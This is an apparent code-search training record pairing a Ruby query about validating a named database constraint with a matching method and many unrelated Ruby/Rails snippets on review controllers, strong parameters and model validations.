"def destroy\n @admin_review.destroy\n respond_to do |format|\n format.html { redirect_to admin_reviews_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n @reservation.reviwed = false\n @reservation.save\n format.html { redirect_to listings_url, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review.destroy\n respond_to do |format|\n format.html { redirect_to @book, notice: 'Review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @auditreview.destroy\n respond_to do |format|\n format.html { redirect_to auditreviews_url, notice: 'Auditreview was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n if (allowAccessIfOwnerNameIsOrRankAtLeast(\"#{@review.poster}\", 1))\n @review.destroy\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n end\n else\n respond_to do |format|\n format.html { redirect_to reviews_url }\n format.json { head :no_content }\n flash[:notice] = 'You do not have permission to delete this review'\n end\n end\n end",
"def destroy\n @user_review = UserReview.find(params[:id])\n @user_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(user_reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @product = Product.find_by(id: params[:product_id])\n @review = Review.find_by(id: params[:id])\n @review.destroy\n\n redirect_to @product, notice: 'Review Deleted'\n end",
"def destroy\n\t\t@book_review = BookReview.find(params[:id])\n\t\t@book_review.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to book_reviews_url }\n\t\t\tformat.json { head :ok }\n\t\tend\n\tend",
"def destroy\n @correction_review.destroy\n respond_to do |format|\n format.html { redirect_to correction_reviews_url, notice: 'Correction review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fourth_review.destroy\n respond_to do |format|\n format.html { redirect_to fourth_reviews_url, notice: 'Fourth review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @product = Product.find(@product_review.product_id)\n @product_review.destroy\n\n redirect_to product_path(@product.id, notice: 'Product review was successfully destroyed.')\n end",
"def destroy\n if user_signed_in? && current_user.admin?\n @new_review = NewReview.find(params[:id])\n @new_review.destroy\n\n respond_to do |format|\n format.html { redirect_to new_reviews_url }\n format.json { head :no_content }\n end\n else\n redirect_to root_path\n end\n end",
"def destroy\n #find the individual review\n @review = Review.find(params[:id])\n # check if user is current poster\n if @review.user == @current_user\n #destroy it\n @review.destroy\n end\n\n #redirect to the homepage\n redirect_to root_path\n end",
"def destroy\n @user_review.destroy\n respond_to do |format|\n format.html { redirect_to user_reviews_url, notice: 'User review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @visitor_review.destroy\n respond_to do |format|\n format.html { redirect_to visitor_reviews_url, notice: 'Visitor review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n\n @product = Product.find(params[:product_id])\n @revoew = @product.reviews.find(params[:id])\n @review.destroy\n\n redirect_to product_path(@product)\n\n end",
"def destroy\n review = Review.find_by(id: params[:id]).destroy\n render json: review\n end",
"def destroy\n @restaurant_review.destroy\n respond_to do |format|\n format.html { redirect_to restaurant_reviews_url, notice: 'Restaurant review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @boo_k_review.destroy\n respond_to do |format|\n format.html { redirect_to boo_k_reviews_url, notice: 'Boo k review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @professor_review = ProfessorReview.find(params[:id])\n @professor_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(professor_reviews_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @blade_review.destroy\n respond_to do |format|\n format.html { redirect_to blade_reviews_url, notice: 'Blade review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @tour_review.destroy\n respond_to do |format|\n format.html { redirect_to tour_reviews_url, notice: 'ツアーレビューは正常に削除されました。' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @hospital = Hospital.find(params[:hospital_id])\n @review = @hospital.reviews.find(params[:id])\n @review.destroy\n respond_to do |format|\n flash[:success] = \"삭제 성공\"\n format.html { redirect_to @hospital }\n format.json { head :no_content }\n end\n end",
"def destroy\n @admin_nature_of_review.destroy\n respond_to do |format|\n format.html { redirect_to admin_nature_of_reviews_url, notice: 'Nature of review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item_review.destroy\n respond_to do |format|\n format.html { redirect_to item_reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @pre_training_review.destroy\n respond_to do |format|\n format.html { redirect_to pre_training_reviews_url, notice: 'Pre training review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @first_review.destroy\n respond_to do |format|\n format.html { redirect_to first_reviews_url, notice: 'First review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @book_review = BookReview.find(params[:id])\n @book_review.destroy\n\n respond_to do |format|\n format.html { redirect_to book_reviews_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @reviews_and_rating.destroy\n respond_to do |format|\n format.html { redirect_to reviews_and_ratings_url, notice: 'Reviews and rating was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item_review.destroy\n respond_to do |format|\n format.html { redirect_to item_reviews_url, notice: 'Item review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @food_review.destroy\n respond_to do |format|\n format.html { redirect_to food_reviews_url, notice: 'Food review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @shop_review.destroy\n respond_to do |format|\n format.html { redirect_to shop_reviews_url, notice: '가게 리뷰가 삭제되었습니다.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n review = Review.find(params[:id])\n if session[:companion_id] == review.companion_id \n review.destroy\n flash[:notice] = \"Review deleted\"\n redirect_to :back\n else\n flash[:notice] = \"This review belongs to another companion\"\n redirect_to :back\n end\n end",
"def destroy\n @review_template.destroy\n respond_to do |format|\n format.html { redirect_to review_templates_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @bizowners_review.destroy\n respond_to do |format|\n format.html { redirect_to bizowners_reviews_url, notice: 'Bizowners review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @thesis_review = ThesisReview.find(params[:id])\n @thesis_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(thesis_reviews_url) }\n format.xml { head :ok }\n end\n end"
] |
[
"0.8825942",
"0.8384066",
"0.83834416",
"0.83834416",
"0.83834416",
"0.8317577",
"0.8287302",
"0.8250263",
"0.8074591",
"0.8063523",
"0.8035887",
"0.7986956",
"0.79630625",
"0.7929023",
"0.79009676",
"0.7885112",
"0.7885112",
"0.78683513",
"0.7867553",
"0.7865634",
"0.7836517",
"0.78259534",
"0.7815818",
"0.781515",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7791554",
"0.778671",
"0.77837086",
"0.77837086",
"0.77837086",
"0.77837086",
"0.77837086",
"0.7770706",
"0.7770706",
"0.7770706",
"0.7766593",
"0.77582324",
"0.7748757",
"0.7742514",
"0.7741067",
"0.7708848",
"0.7699243",
"0.7696409",
"0.76946044",
"0.76929766",
"0.76857704",
"0.76784056",
"0.76587087",
"0.76579046",
"0.7648974",
"0.7639552",
"0.7621031",
"0.761884",
"0.7595258",
"0.75898767",
"0.75856936",
"0.7585108",
"0.7580692",
"0.7572697",
"0.7568784",
"0.7568715",
"0.7563558",
"0.7549886",
"0.7542456",
"0.7541992",
"0.75386775",
"0.7538543",
"0.75352013",
"0.75254506",
"0.75199807",
"0.7516924",
"0.7516363",
"0.7515274",
"0.7512383",
"0.7507601",
"0.74858373",
"0.7462543",
"0.7452073",
"0.7434259",
"0.7398263",
"0.7398244",
"0.7382996",
"0.73742527",
"0.7373981",
"0.7373173",
"0.73660254",
"0.7344239",
"0.73280823",
"0.7327274",
"0.73138916",
"0.73120564",
"0.7304773",
"0.7296245"
] |
0.81108975
|
8
|
review_params lists all the permitted parameters for the review table
|
def review_params
params.require(:review).permit(:name, :priority, :comment)
end
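A minimal usage sketch (the create action below is hypothetical, not from the source): the permitted hash returned by review_params is what reaches mass assignment, so any key outside the permit list is silently dropped.

def create
  # params.require(:review) raises ActionController::ParameterMissing
  # if the :review key is absent; permit whitelists only the three keys.
  @review = Review.new(review_params)
  if @review.save
    redirect_to @review, notice: 'Review was successfully created.'
  else
    render :new
  end
end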
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def review_params\n parm = params.fetch(:review, {}).permit!\n p 'params', parm\n parm\n end",
"def review_params\n # params.require(:review).permit(:membership_id, :user_id, :rating, :comments, :lti_app_id)\n end",
"def review_params\n params.permit(:review, :body, :title, :reviewable_id, :reviewable_type)\n end",
"def review_params\n\t\t\tparams.require(:review).permit(:comment, :rating)\n\t\tend",
"def review_params\n params.require(:review).permit(:title, :description, :overall_rating, :replayability, :first_time_difficulty, :user_id, :boardgame_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :description, :professor_id, :course_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :comic_id, :review_text, :review_title, :netabare, :tag_list, :star)\n end",
"def review_params\n params.require(:review).permit(:overall_rating, :supervisor_rating, :time_commitment, :expected, :work_description, :anonymous, :reflection, :supervisor_id, :student_id) \n end",
"def review_params\n\t\tparams.require(:review).permit(:heading, :review, :book_id, :user_id, :status, :cover_page)\n\tend",
"def review_params\n params.require(:review).permit(\n :overall_rating,\n :letter_grade,\n :semester,\n :year,\n :course_required,\n :interesting,\n :difficult,\n :standardized_course,\n :course_other_thoughts,\n :used_textbook,\n :attendance_mandatory,\n :course_format,\n :cared_about_material,\n :open_to_questions,\n :cared_about_students,\n :clear_grading,\n :homework_heavy,\n :clear_explanations,\n :fast_grading,\n :professor_other_thoughts,\n :professor_id,\n :course_id\n )\n end",
"def review_params\n params.require(:review).permit(:property_id, :body, :title, :property_rating, :created_at, :updated_at, :landlord_rating, :landlord_comments, :duration, :is_anonymous, :is_current_tenant)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def critic_review_params\n params[:critic_review]\n end",
"def review_params\n params.require(:review).permit(:product_image, :email, :location_id, :comment, :reviewer_image, :visibility, :product_name, :first_name, :last_name)\n end",
"def review_params\n params.fetch(:comment_review, {}).permit(:id,:comment_id,:review_text,:admin_id)\n end",
"def review_params\n params.require(:review).permit(:debt_placement_id, :review_level, :service_level, :aggresive_level, :speed_level, :description)\n end",
"def review_params\n params.require(:review).permit(:rating, :review_text, :book_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:reviewer, :reviewee, :skill_id, :stars, :body)\n end",
"def visitor_review_params\n params.fetch(:visitor_review, {})\n end",
"def reviews_and_rating_params\n params.fetch(:reviews_and_rating, {})\n end",
"def review_params\n params.require(:review).permit( :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :user_id, :movie_id, :rating)\n end",
"def review_params\n params.require(:review).permit(:lecture_id, :user_id, :content, :rating)\n end",
"def review_params\n params.require(:review).permit(:comment, :rating, :book_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:title, :published, :author, :category_id, :score, :content, :portrait)\n end",
"def review_params\n params.require(:review).permit(:name, :comment, :rating, :product_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:score, :confidence, :comments, :paper_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment, :site_id)\n end",
"def review_params\n params.require(:review).permit(:author, :author_id, :top, :body, :rating, :user_id, :employer, :title)\n end",
"def review_params\n params.require(:review).permit(:rating, :review_content, :date_time)\n end",
"def review_params\n params.require(:review).permit(:first_name, :last_name, :product_name, :image_url, :location, :feedback, :stars, :category_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :target, :rating, :review)\n end",
"def admin_review_params\n params.fetch(:review, {}).permit(whitelisted_params)\n end",
"def review_params\n params.require(:review).permit(:author, :content, :rating, :user_id)\n end",
"def review_params\n params.require(:review).permit(:yelp_business_id, :yelp_user_id, :content, :stars)\n end",
"def review_params\n params.require(:review).permit(:customer_id, :car_id, :reservation_id, :content, :rating)\n end",
"def review_params\n params.require(:review).permit(:reviewer, :body)\n end",
"def review_params\n params.require(:review).permit(:menu, :comment, :image)\n end",
"def review_params\n params.require(:review).permit( :comment, :attraction_id)\n end",
"def review_params\n params.require(:review).permit(:description, :rating, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:title, :description, :score, :course_id)\n end",
"def review_params\n params.permit(:reviewer, :comment, :rating, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:content, :rating)\n end",
"def user_review_params\n params.require(:user_review).permit(:review_item_id, :user_id, :rated_by_user_id, :notes_allowed, :rate_period, :rating, :is_team, :pros, :cons, :notes, :is_archived, :checked, :multiplier, :team_id, review_notes_attributes: [:user_review_id, :general_notes, :pros, :cons] )\n end",
"def review_params\n params[:review].permit(:title, :content)\n end",
"def review_params\n params.require(:review).permit(:name, :description, :body, :year, :date, :place, :img, :artist_id, :category_id, :author_id, :fav1, :fav2, :fav3)\n end",
"def review_params\n params.require(:department_review).permit(:id, :title, :description, :score, :city_id, :user_id, :scorable_id, :scorable_type, :love_list, :improve_list, :image)\n end",
"def review_params\n\n params_new = params.require(:review).permit(:rating, :comments)\n params_new[:customer_id] = session[:customer_id]\n @bookings = Booking.find(params[:id])\n params_new[:listing_id] = @bookings.listing_id\n params_new[:anonymous] = params[:anonymous]\n params_new\n end",
"def review_params\n params.fetch(:review, {}).permit(:rating, :body, :restaurant_id, :timestamp)\n end",
"def review_params\n params.require(:review).permit(:user_id, :shop_id, :order_id, :content, :score)\n end",
"def review_params\n params.require(:review).permit(:rating, :content)\n end",
"def review_params\n params.require(:review).permit(:game_id, :user_id, :score, :content)\n end",
"def review_params\n params.require(:review).permit(:comment)\n end",
"def review_params\n params.require(:review).permit(:comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :rating, :brewery)\n end",
"def review_params\n params.require(:review).permit(:name, :email, :content, :score, :subscription_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:description, :rating)\n end",
"def review_params\n params.require(:review).permit(:comment, :title, :rating,\n :parking_space_id, :owner_name)\n end",
"def review_params\n params.require(:review).permit(:comment, :rating, :user_id)\n end",
"def permited_params\n params.require(:review).permit(:title, :detail, :rating)\n end",
"def review_params\n params.require(:review).permit(:workstation_id, :monitor1, :monitor2, :monitor3, :hardware, :graphic_card_id, :os_distro_id, :remarks)\n end",
"def review_params\n params.require(:review).permit(:rating, :description)\n end",
"def review_params\nparams.require(:review).permit(:rating, :comment)\n\tend",
"def review_params\n params.require(:review).permit(:place_id, :content, :score)\n end",
"def review_params\n params.require(:review).permit(:title, :poster, :date, :article)\n end",
"def review_params\n params.require(:review).permit(:name, :email, :title, :body)\n end",
"def review_params\n params.require(:review).permit(:content,:user_id,:entry_id,:rating)\n end",
"def review_params\n params.require(:review).permit(:title, :author, :rating, :user_id)\n end",
"def review_params\n params.require(:review).permit(:r_title, :r_content, :grade ,:user_id, :hospital_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :service_id, :text)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :score, :hotel_id, :user_id)\n end",
"def product_review_params\n params.require(:product_review).permit(:author, :comment, :rating, :product_id)\n end",
"def reviews_params\n params.require(:review).permit(:name, :email, :content, :score)\n end",
"def movie_review_params\n params.require(:movie_review).permit(:comment, :reviewer, :movie_id)\n end",
"def boo_k_review_params\n params.require(:boo_k_review).permit(:user_id, :book_id, :review)\n end",
"def review_params\n params.permit(:appointment_id, :talent_id)\n params.require(:review).permit(:mark, :comment)\n end",
"def review_params\n params.require(:review).permit(:body)\n end",
"def review_params\n params.require(:review).permit(:title, :taste_eval,:price_eval,:service_eval,:contents, :restaurant_id,:image_path)\n end",
"def restaurant_review_params\n params.require(:restaurant_review).permit(:reviewer_name, :rating, :comment, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:content, :rating)\n end",
"def employee_review_params\n params.require(:employee_review).permit(:user, :review, :rating)\n end",
"def item_review_params\n params.require(:item_review).permit(:restaurant_id, :user_id, :item_id, :review, :rating, :date)\n end",
"def facility_review_params\n params.require(:facility_review).permit(:reviewer, :facility, :title, :description, :rating)\n end",
"def reviewing_params\n params.require(:reviewing).permit(:book_id, :rate, :review)\n end",
"def auditreview_params\n #params.fetch(:auditreview, {})\n params.require(:auditreview).permit(:tenant_id, :date, :correct, :incorrect, :mealtime, :category, :rating)\n end",
"def review_params\n params.require(:review).permit(:content)\n end",
"def pre_training_review_params\n params.require(:pre_training_review).permit(:rpl, :credit_transfer, :area_of_work, :employment, :pathway, :preferred_learning_style, :delivery_mode, :special_condition, :toc, :user_id)\n end",
"def tour_review_params\n params.require(:tour_review).permit(:user_id, :tour_id, :review)\n end",
"def correction_review_params\n params.require(:correction_review).permit(:reviewer_id_id, :correction_id, :assignment_schedule_id, :score_delta, :student_comment, :reviewer_comment)\n end",
"def event_review_params\n params.require(:event_review).permit(:review, :user_id, :event_id)\n end",
"def bookreview_params\n params.require(:bookreview).permit(:rating, :summary, :details, :book_id)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :book_id)\n end",
"def review_params\n params.permit(:body, :city, :country, :user_name, :rating)\n end",
"def hm_review_params\n params.require(:hm_review).permit(:hm_name, :hm_creator, :hm_comment, :hm_point, :created_at, :updated_at)\n end"
] |
[
"0.84528714",
"0.7881275",
"0.7713893",
"0.7698338",
"0.7690936",
"0.7651478",
"0.7588309",
"0.757079",
"0.75666517",
"0.75534165",
"0.7545849",
"0.75402623",
"0.75402623",
"0.75402623",
"0.7513782",
"0.74998313",
"0.7499796",
"0.7496023",
"0.74620646",
"0.7461283",
"0.745369",
"0.74453694",
"0.74376005",
"0.7437249",
"0.7433492",
"0.74278486",
"0.7427361",
"0.74235296",
"0.7423048",
"0.7423048",
"0.7407763",
"0.7403834",
"0.73898387",
"0.7358056",
"0.7335495",
"0.73305166",
"0.7312721",
"0.73068035",
"0.73051816",
"0.7296472",
"0.7290001",
"0.72889525",
"0.72763413",
"0.7257099",
"0.7255987",
"0.7255803",
"0.72468156",
"0.723076",
"0.7227118",
"0.721818",
"0.7208641",
"0.7198774",
"0.7197494",
"0.7197222",
"0.71951324",
"0.7194026",
"0.71753997",
"0.7161622",
"0.7161622",
"0.7158953",
"0.71588564",
"0.7150867",
"0.71505594",
"0.71421635",
"0.71323967",
"0.71196383",
"0.7118672",
"0.7100986",
"0.7089823",
"0.7089729",
"0.7087785",
"0.70851505",
"0.7082389",
"0.7075126",
"0.7073826",
"0.7057396",
"0.70375454",
"0.7032473",
"0.70295596",
"0.70288265",
"0.70192915",
"0.7013535",
"0.7012168",
"0.6995024",
"0.6983851",
"0.6976103",
"0.69183",
"0.6905184",
"0.6904534",
"0.6899706",
"0.6888054",
"0.68824387",
"0.68801653",
"0.68794614",
"0.6855281",
"0.6817094",
"0.6813105",
"0.67794627",
"0.677887",
"0.6768712"
] |
0.7401983
|
32
|
Validate the constraint with the given name, which should have been added previously with NOT VALID.
|
def validate_constraint(name)
@operations << {:op => :validate_constraint, :name => name}
end
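For context, a hedged sketch of how the queued operation could later be flushed to SQL (the run method, connection argument, and table name are assumptions, not from the source). In PostgreSQL, a constraint added with NOT VALID is only checked against pre-existing rows once VALIDATE CONSTRAINT runs:

def run(connection, table_name)
  @operations.each do |op|
    case op[:op]
    when :validate_constraint
      # Scans existing rows for violations, but takes a weaker lock than
      # adding the constraint without NOT VALID would have.
      connection.execute("ALTER TABLE #{table_name} VALIDATE CONSTRAINT #{op[:name]}")
    end
  end
end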
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def validator_defined_for?(constraint_name)\n !!validator_for(constraint_name)\n end",
"def name_invalid\n errors.add(:name, :unknown)\n end",
"def name_is_valid\n errors.add(:name,'Invalid empty string for name.') unless name_is_valid?\n end",
"def name_is_valid\n errors.add(:name,\"Invalid string for name.\") unless name_is_valid?\n end",
"def not_reserved\n errors.add(:name, 'is reserved') if self.name.downcase.in?(self.class.reserved_names)\n end",
"def validate_name\n unless name.length > 0\n add_error :name, 'name of the price item shall be provided'\n end\n\n unless price.to_i > 0\n add_error :price, 'price should be a number'\n end\n end",
"def validator_for(constraint_name)\n validator_name_for(constraint_name).safe_constantize\n end",
"def name_not_blank\n if self.name.blank?\n self.errors.add(:name, I18n.t('stage.errors.blank_name'))\n end\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def constraint_by_name(name)\n self[name]\n end",
"def valid_name!(name)\n not_empty!(name)\n unless [String, Symbol].include?(name.class)\n coercion_error!\n end\n name\n end",
"def name_unique_in_clinic\n errors.add(:name, \"Name: #{name} already in use\") unless\n name_unique_in_clinic?\n end",
"def validators_on(name)\n ::Kernel.raise Errors::NotImplemented\n end",
"def validate_exclusion_of(attr); end",
"def name_can_not_be_greg\n if self && self.name.downcase == \"greg\"\n self.errors.add(:name, \"Can not be Greg\")\n end \n end",
"def param_for_validation?(name)\n if respond_to?(name)\n !send(name).nil?\n else\n !param_before_type_cast(name).nil?\n end\n end",
"def account_name_cannot_be_in_use\n if Account.find_by_name(account_name)\n errors.add(:account_name, \"Sorry, this name is already in use\")\n end\n end",
"def validator_name_for(constraint_name)\n \"#{self.name}::#{constraint_name.to_s.camelize}Validator\"\n end",
"def name_valid(name)\n if !name.empty?\n self.name = name\n return true\n end\n end",
"def validated?(name)\n true\n end",
"def valid?\n !name.nil?\n end",
"def valid?\n !name.nil?\n end",
"def valid?\n !name.nil?\n end",
"def validate_name\n\t\t\tunless Nacreon::NameRX.match(name)\n\t\t\t\terrors.add(:name,\n\t\t\t\t\t'must contain only letters, numbers, and \"-\".')\n\t\t\tend\n\t\tend",
"def required?(name); end",
"def test_should_require_name\n intitution = create(:name => nil)\n assert intitution.errors.invalid?(:name), \":name should be required\"\n assert_invalid intitution, \"intitution shouldn't be created\"\n end",
"def clean(_name)\n @rules.delete(_name)\n end",
"def validate()\n errors.add(:nombre, \"debe ser positivo\") if nombre.nil?\n end",
"def validateName(name)\n if (name == nil)\n return false\n end\n \n return true # TODO This is wrong. Finish this function.\nend",
"def call_to(name)\n @validators.delete(name.to_s)\n end",
"def name_valid(name)\n if !name.empty?\n self.name = name\n return true\n else\n return false\n end\n end",
"def name_is_unique\n return if self.name.nil?\n errors.add(:name, 'has already been taken') if Institution.where(name: self.name).reject{|r| r == self}.any?\n end",
"def _validate_name(name)\n if name =~ %r{/}\n results.add_error('name', 'The name of a spec should not contain ' \\\n 'a slash.')\n end\n\n if name =~ /\\s/\n results.add_error('name', 'The name of a spec should not contain ' \\\n 'whitespace.')\n end\n\n if name[0, 1] == '.'\n results.add_error('name', 'The name of a spec should not begin' \\\n ' with a period.')\n end\n end",
"def incompatible_constraint(attribute_names, options = {}, &block)\n constraint = IncompatibleConstraint.new(self, attribute_names, options, &block)\n attribute_names.collect { |a| attribute_by_name(a) }.each do |a|\n error(\"Incompatible constraint #{constraint.name} on #{self.name} has an illegal non nullable attribute\") if !a.nullable?\n end\n add_unique_to_set(\"incompatible\", constraint, @incompatible_constraints)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def add_validation(name, validation)\n validations_by_name[name] = validation\n end",
"def name_is_valid?\n return false unless not_nil_and_string(self.name)\n return self.name.length > 0\n end",
"def name_is_valid?\n return false unless not_nil_and_string(self.name)\n return self.name.length > 0\n end",
"def validates_presence_of_final_calculation_prerequisite(name)\n return unless validators_on(name).empty?\n validates_presence_of name\n end",
"def check_tag_format\n errors.add(:name, 'is not a valid tag') unless name =~ Tag.validation_regex\n end",
"def validate_attributes!(attributes)\n return missing_required unless attributes.key?(:name)\n return missing_required unless defined_value?(attributes[:name])\n\n true\n end",
"def name_must_be_unique_if_organization\n unless type == \"Individual\"\n self.errors.add(:name, :is_already_taken) if Entity.where('lower(name) = ?', name.downcase).any?\n end\n end",
"def assert_valid\n raise ValidationError, \"no name\" unless name\n raise ValidationError, \"no version\" unless version\n raise ValidationError, \"no summary\" unless summary\n #raise ValidationError, \"no maintainer\" unless maintainer\n #raise ValidationError, \"no homepage\" unless homepage\n end",
"def test_should_require_name\n ng = NodeGroup.create(:name => nil)\n assert ng.errors.on(:name)\n end",
"def company_account_name_unique\n errors.add(:name, 'already exists') if name && account_name_exists?\n end",
"def validate_domain(name)\n jid = Blather::JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_domain(name)\n jid = JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_domain(name)\n jid = JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_name_is_unique_among_materials\n return if parent.nil?\n\n # conflicts = parent.materials.where.has { |parent| name =~ parent.name }\n conflicts = parent.materials.where(Course::Material.arel_table[:name].matches(name))\n errors.add(:name, :taken) unless conflicts.empty?\n end",
"def add_exclusion_constraint(vectors, options = {})\n subset = @variable_set.create_subset(vectors)\n if !subset.empty?\n constraint_hash = {\n :vars => subset.to_lp_vars,\n :operator => '=',\n :target => 0\n }\n constraint_hash[:name] = options[:name] if options.has_key?(:name)\n @constraints << Constraint.new(constraint_hash)\n end\n end",
"def required_attribute(name, options={:level=>:error})\n\t\t\t\tvalidate(\"Macro '#{@name}' requires a '#{name}' attribute\", options) do\n\t\t\t\t\t!raw_attribute(name.to_sym).blank?\n\t\t\t\tend\n\t\t\tend",
"def supports_check_constraints?\n false\n end",
"def validate\n raise \"A name for the collection is required.\" unless @attributes[:name]\n raise \"A source for the collection is required (created_by_id).\" unless @attributes[:created_by_id]\n end",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def update_attribute_with_validation_skipping(name, value)\n send(name.to_s + '=', value)\n save(false)\n end",
"def constraints(_)\n nil\n end",
"def constraint_regexp_for( name )\n\t\tself.log.debug \" searching for a constraint for %p\" % [ name ]\n\n\t\t# Fetch the constraint's regexp\n\t\tconstraint = self.constraints[ name.to_sym ] or\n\t\t\traise NameError, \"no such parameter %p\" % [ name ]\n\t\traise ScriptError,\n\t\t\t\"can't route on a parameter with a %p\" % [ constraint.class ] unless\n\t\t\tconstraint.respond_to?( :pattern )\n\n\t\tre = constraint.pattern\n\t\tself.log.debug \" bounded constraint is: %p\" % [ re ]\n\n\t\t# Unbind the pattern from beginning or end of line.\n\t\t# :TODO: This is pretty ugly. Find a better way of modifying the regex.\n\t\tre_str = re.to_s.\n\t\t\tsub( %r{\\(\\?[\\-mix]+:(.*)\\)}, '\\1' ).\n\t\t\tgsub( PARAMETER_PATTERN_STRIP_RE, '' )\n\t\tself.log.debug \" stripped constraint pattern down to: %p\" % [ re_str ]\n\n\t\treturn Regexp.new( \"(?<#{name}>#{re_str})\", re.options )\n\tend",
"def supports_exclusion_constraints?\n false\n end",
"def valid_scope_name?(name)\n if scopes[name] || respond_to?(name, true)\n if Mongoid.scope_overwrite_exception\n raise Errors::ScopeOverwrite.new(self.name,name)\n else\n if Mongoid.logger\n Mongoid.logger.warn(\n \"Creating scope :#{name}. \" +\n \"Overwriting existing method #{self.name}.#{name}.\"\n )\n end\n end\n end\n end",
"def _sanity_check(schema)\n raise SchemaInternalError, \"No name provided on #{self}\" if name.nil?\n super(schema)\n end",
"def depends(name, constraint = \">= 0\")\n if name.nil?\n raise ArgumentError, \"A name must be specified. You gave: #{args}.\"\n end\n\n dependency = Dependency.new(self, name, constraint)\n add_dependency(dependency)\n\n self\n end",
"def override( name, *args, &block )\n\t\tname = name.to_sym\n\t\traise ArgumentError,\n\t\t\t\"no parameter %p defined; perhaps you meant to use #add?\" % [ name.to_s ] unless\n\t\t\tself.constraints.key?( name )\n\n\t\tself.log.debug \"Overriding parameter %p\" % [ name ]\n\t\tself.constraints[ name ] = Constraint.for( name, *args, &block )\n\n\t\tself.validated = false\n\tend",
"def allow?(name) \n return return_symbol if name_matchers.reject{|name_matcher| !name.match(name_matcher) } \n end",
"def invalid_param_errors\n\t\treturn self.invalid.collect do |field, _|\n\t\t\tconstraint = self.constraints[ field.to_sym ] or\n\t\t\t\traise NameError, \"no such field %p!\" % [ field ]\n\t\t\t\"Invalid value for '%s'\" % [ constraint.description ]\n\t\tend\n\tend",
"def invalid?\n good_ones = ['Ready','Submittable','Completed','Resubmittable','InProgress']\n return !good_ones.include?(name)\n end",
"def name_present\n if name.blank?\n errors.add(:name, \"Can't be empty\")\n end\n end",
